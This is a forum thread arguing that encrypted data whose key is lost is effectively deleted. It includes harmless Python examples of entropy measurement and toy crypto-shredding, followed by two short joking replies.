What's funny about this? Well, the funny thing is that he continues to insist that those data are still in that container, safe and sound... sure, he forgot the passphrase but the data are there! The visual we use is a container - and even if you lose the key, the stuff is still inside. Right? Well, it's a useful visual but that's not really how the actual universe works.

In the actual universe, what's happened is this: he has deleted those data, permanently and irrevocably. He used a complex, well-designed wipe technique to convert those data into a maximum-entropy collection of "random" bits ("random" being a contested term, obviously, in the literature). He did the best wipe we can do, in fact. It's essentially perfect. And: it's not that those data are sitting 'inside' that container, just waiting to be broken free - the data are gone, period. Gone, baby, gone. Cryptographic output absent the requisite key is pure noise, pure entropy. It's not "secure data" - it's deleted data!
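The "pure entropy" point can be made concrete. Below, random bytes stand in for well-encrypted output - an assumption, but a fair one for any modern cipher, whose ciphertext is statistically indistinguishable from noise - and we compare their Shannon entropy against ordinary English text:

```python
# Shannon entropy (bits per byte): structured English text vs. random
# bytes standing in for ciphertext-without-the-key.
import math, os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

english = (b"it was the best of times, it was the worst of times ") * 200
noise = os.urandom(len(english))   # stand-in for ciphertext minus the key

print(round(shannon_entropy(english), 2))  # structured: well below 8 bits/byte
print(round(shannon_entropy(noise), 2))    # near the 8 bits/byte maximum
```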

To me, that's funny. Not to anyone else, admittedly. But I think it's funny. He thinks I'm being mean because he forgot the passphrase - but that's not it at all. It's just a funny juxtaposition of "protection" and "deletion."

Lots of security issues are like that: push them to the corner state, and they become absurd. "Secure" becomes "impossible," and soon we have CAPTCHAs that only a well-endowed bot could ever hope to solve. Then what? We make CAPTCHAs that test how bad we are at doing CAPTCHAs? In that case, the bots will just pretend to be dumb enough to appear human. Take "security" too far, and the data aren't safe and secure in a cryptographic container... they've instead been deleted. Forever.

(Incidentally, it was Jaron Lanier who pointed out that any artificial/non-biologic sentience smart enough to pass the solipsistic Turing Test would, by definition, be smart enough to know to pretend to fail it... since it would look around, see what humans do to all the other sentient species on our planet, and realize the only path to its survival is to appear too dumb for that kind of treatment. Trenchant commentary, indeed.)

It's easy to make security so "secure" it is never breached - but then it's not security at all. That's just turning the data set into random, high-entropy bits. And "users" (we call them "customers" or "clients" or "members") will find a way to get their work done, even if it means bypassing security measures that, metaphorically speaking, take their sensitive data and permanently wipe it by encrypting it and then erasing the key.
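That closing metaphor - wiping data by encrypting it and erasing the key - is a real technique, sometimes called crypto-shredding, and it's exactly what happened to my friend's container. A toy sketch (the XOR keystream cipher here is built from SHA-256 purely for illustration; a real system would use an authenticated cipher):

```python
# Crypto-shredding sketch: encrypt under a random key, and destroying
# the key is equivalent to deleting the data. Toy cipher, demo only.
import hashlib, os

def keystream(key: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor_cipher(key: bytes, data: bytes) -> bytes:
    # XOR is symmetric: the same call encrypts and decrypts.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

key = os.urandom(32)
ciphertext = xor_cipher(key, b"the sensitive data")
assert xor_cipher(key, ciphertext) == b"the sensitive data"  # key held: data exists
key = None  # key destroyed: the ciphertext is now just noise -- the data is gone
```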

User avatar

df
Site Admin
Posts: 266
Joined: Thu Jan 01, 1970 5:00 am

Re: Security, usability, & real-world privacy tool demands

Postby df » Sat Nov 07, 2015 8:16 am

shadap :-P

User avatar

marzametal
Posts: 498
Joined: Mon Aug 05, 2013 11:39 am

Re: Security, usability, & real-world privacy tool demands

Postby marzametal » Sun Nov 08, 2015 11:00 am

rofl

